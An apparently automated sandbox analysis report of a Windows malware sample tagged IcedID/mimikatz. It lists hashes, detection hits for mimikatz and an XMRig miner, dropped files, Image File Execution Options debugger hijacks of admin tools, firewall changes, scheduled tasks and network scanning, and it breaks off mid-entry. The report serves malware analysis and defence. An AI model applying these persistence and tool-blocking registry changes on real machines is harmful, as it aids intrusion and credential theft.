Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22/05/2024, 14:41
Behavioral task
behavioral1
Sample
2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe
-
Size
7.7MB
-
MD5
4f09f05424d04023ae08ef786758c686
-
SHA1
c01064a85e917fb60dc9e5673a57921eca95faa2
-
SHA256
70e6f960bfabf9c1de2f859753f0ef3bc2b53637a3d5dc40f5dcf5374d49e659
-
SHA512
3550988c51a25dbb2fbeeddba5aa8be90e618159598fe4f57cba6d4d45e3ea709f846501c67c9a6a4bf9ed7724c59c0edc736b217cd1363c8a1c3aa73787be42
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1540 created 2164 1540 vkdejee.exe 38 -
Contacts a large (28795) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/1124-138-0x00007FF64A2B0000-0x00007FF64A39E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 42 IoCs
resource yara_rule behavioral2/memory/1604-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/1604-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023407-5.dat UPX behavioral2/memory/3688-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023446-134.dat UPX behavioral2/memory/1124-136-0x00007FF64A2B0000-0x00007FF64A39E000-memory.dmp UPX behavioral2/memory/1124-138-0x00007FF64A2B0000-0x00007FF64A39E000-memory.dmp UPX behavioral2/files/0x0007000000023451-155.dat UPX behavioral2/memory/3408-156-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/3408-160-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/files/0x000700000002344e-164.dat UPX behavioral2/memory/1088-166-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/4012-171-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1452-175-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/3132-179-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1088-182-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/3896-184-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/3432-188-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/3664-192-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1088-194-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/4964-197-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/4116-201-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1088-203-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/4268-206-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/4228-210-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1088-212-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/3840-215-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/3260-219-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1088-222-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/2092-224-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1012-228-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/2600-231-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1416-232-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1416-234-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1088-235-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/4332-239-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp UPX behavioral2/memory/1088-250-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/1088-251-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/1088-254-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/1088-305-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/1088-310-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX behavioral2/memory/1088-312-0x00007FF68E240000-0x00007FF68E360000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1088-182-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-194-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-203-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-212-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-222-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-235-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-250-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-251-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-254-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-305-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-310-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig behavioral2/memory/1088-312-0x00007FF68E240000-0x00007FF68E360000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1604-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1604-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023407-5.dat mimikatz behavioral2/memory/3688-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1124-138-0x00007FF64A2B0000-0x00007FF64A39E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts vkdejee.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts vkdejee.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4420 netsh.exe 1636 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe vkdejee.exe -
Executes dropped EXE 29 IoCs
pid Process 3688 vkdejee.exe 1540 vkdejee.exe 448 wpcap.exe 632 pivnitiek.exe 1124 vfshost.exe 720 xohudmc.exe 4600 wokakm.exe 3408 ibibzztte.exe 1088 fpibei.exe 4012 ibibzztte.exe 1452 ibibzztte.exe 3132 ibibzztte.exe 3896 ibibzztte.exe 3432 ibibzztte.exe 3664 ibibzztte.exe 4964 ibibzztte.exe 4116 ibibzztte.exe 4268 ibibzztte.exe 4228 ibibzztte.exe 3840 ibibzztte.exe 3260 ibibzztte.exe 2092 ibibzztte.exe 1012 ibibzztte.exe 2600 ibibzztte.exe 1416 ibibzztte.exe 4332 ibibzztte.exe 3388 vkdejee.exe 3852 fuinnkdmr.exe 4160 vkdejee.exe -
Loads dropped DLL 12 IoCs
pid Process 448 wpcap.exe 448 wpcap.exe 448 wpcap.exe 448 wpcap.exe 448 wpcap.exe 448 wpcap.exe 448 wpcap.exe 448 wpcap.exe 448 wpcap.exe 632 pivnitiek.exe 632 pivnitiek.exe 632 pivnitiek.exe -
resource yara_rule behavioral2/files/0x0007000000023446-134.dat upx behavioral2/memory/1124-136-0x00007FF64A2B0000-0x00007FF64A39E000-memory.dmp upx behavioral2/memory/1124-138-0x00007FF64A2B0000-0x00007FF64A39E000-memory.dmp upx behavioral2/files/0x0007000000023451-155.dat upx behavioral2/memory/3408-156-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/3408-160-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/files/0x000700000002344e-164.dat upx behavioral2/memory/1088-166-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/4012-171-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1452-175-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/3132-179-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1088-182-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/3896-184-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/3432-188-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/3664-192-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1088-194-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/4964-197-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/4116-201-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1088-203-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/4268-206-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/4228-210-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1088-212-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/3840-215-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/3260-219-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1088-222-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/2092-224-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1012-228-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/2600-231-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1416-232-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1416-234-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1088-235-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/4332-239-0x00007FF7FEC00000-0x00007FF7FEC5B000-memory.dmp upx behavioral2/memory/1088-250-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/1088-251-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/1088-254-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/1088-305-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/1088-310-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx behavioral2/memory/1088-312-0x00007FF68E240000-0x00007FF68E360000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 85 ifconfig.me 86 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 vkdejee.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 vkdejee.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\wokakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File created C:\Windows\SysWOW64\wokakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vkdejee.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\umubtmbps\Corporate\log.txt cmd.exe File created C:\Windows\umubtmbps\bbrcgicuu\scan.bat vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trch-1.dll vkdejee.exe File created C:\Windows\umubtmbps\Corporate\vfshost.exe vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimidrv.sys vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.xml vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimilib.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\svschost.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\crli-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libeay32.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\posh-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\spoolsrv.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\ip.txt vkdejee.exe File opened for modification C:\Windows\gibpmken\vkdejee.exe 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libxml2.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\upbdrjv\swrpwe.exe vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\schoedcl.xml vkdejee.exe File created C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe File created C:\Windows\ime\vkdejee.exe vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\coli-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ssleay32.dll vkdejee.exe File created C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\cnli-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\docmicfg.xml vkdejee.exe File created C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture64.dll vkdejee.exe File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Result.txt fuinnkdmr.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trfo-2.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\xdvl-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\Shellcode.ini vkdejee.exe File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.exe vkdejee.exe File created C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\tibe-2.dll vkdejee.exe File opened for modification C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture32.dll vkdejee.exe File created C:\Windows\gibpmken\vkdejee.exe 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\UnattendGC\vimpcsvc.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\exma-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ucl.dll vkdejee.exe File created C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\tucl-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\zlib1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.exe vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.xml vkdejee.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4284 sc.exe 3896 sc.exe 448 sc.exe 3728 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023407-5.dat nsis_installer_2 behavioral2/files/0x001100000002340a-15.dat nsis_installer_1 behavioral2/files/0x001100000002340a-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5008 schtasks.exe 1196 schtasks.exe 4624 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" vkdejee.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created 